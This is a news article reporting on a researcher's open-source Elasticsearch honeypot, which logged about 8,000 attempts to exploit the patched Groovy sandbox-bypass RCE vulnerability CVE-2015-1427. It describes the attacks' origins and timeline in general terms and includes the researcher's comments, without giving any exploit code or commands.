Elasticsearch Honeypot Snares 8,000 Attacks Against RCE Vulnerability

Hackers are exploiting a remote code execution vulnerability in Elasticsearch, according to one researcher who published logs from a honeypot he built showing 8,000 attempts to exploit the bug.

Hackers have taken an interest in Elasticsearch, a popular enterprise search engine.

A researcher based in Texas, whose own Elasticsearch server was hacked, today published results collated from a honeypot he built to get a sense of how widespread attacks are against the vulnerability that did in his server.

Jordan Wright said he saw close to 8,000 attempts against his Elastichoney honeypot, most of those (93 percent) coming from Chinese IP address; about 300 unique IPs tried to attack his honeypot.

Their means of attack was exploit code against a remote code execution vulnerability discovered earlier this year in Elasticsearch. The attackers were using the vulnerability (CVE-2015-1427) to automatically download and run malware on vulnerable Elasticsearch servers. In Wright’s case, he said one of his virtual servers running on Digital Ocean was attacking other hosts in a distributed denial-of-service attacks.

The vulnerability has been patched in Elasticsearch since February; an attacker exploiting an issue in the Elasticsearch Groovy scripting engine in versions older than 1.4.3 is able to bypass built-in sandbox protections. Exploit code will allow an attacker to execute shell commands on the server.

“Since this is an unauthenticated remote code execution (RCE) vulnerability, any attacker that can reach the server can run any system commands they want,” Wright told Threatpost. “In most cases, this allows them to take full control of the host. They can compromise multiple hosts in this fashion to form a botnet to do their bidding.”

Wright has made his Elastichoney logs available for download. Most of the activity, he said, was the use of whoami commands, which display domain and user name information, but in some instances including the attack against his server, the attackers used wget commands to download and run the malware from a third-party server. Wright said the samples were “basic bots.”

“I’ve only seen attacks from about 300 unique IP addresses; it tells me that this vulnerability still isn’t too widely known,” Wright said. “Unauthenticated RCE vulnerabilities are quick wins for attackers.”

His honeypot is open source and mimics a vulnerable Elasticsearch instance online, and logs all activity against the vulnerability.

“In my own logs, I suppose an interesting observation would be the geographic distribution of these attacks. 93% of attacks were coming from multiple IP addresses for systems located in China,” Wright said. “While IP address doesn’t equal attribution, these are the systems performing the attacks.”

The timeline for the majority of attacks spiked between March 20 and April 11 and stopped at the same time, Wright said.

“I haven’t done the research to determine how many vulnerable systems are available, but my guess is that Elasticsearch users will be the same as other users,” Wright said. “Some will patch, some won’t. This bug will likely be around for quite a while.”

Suggested articles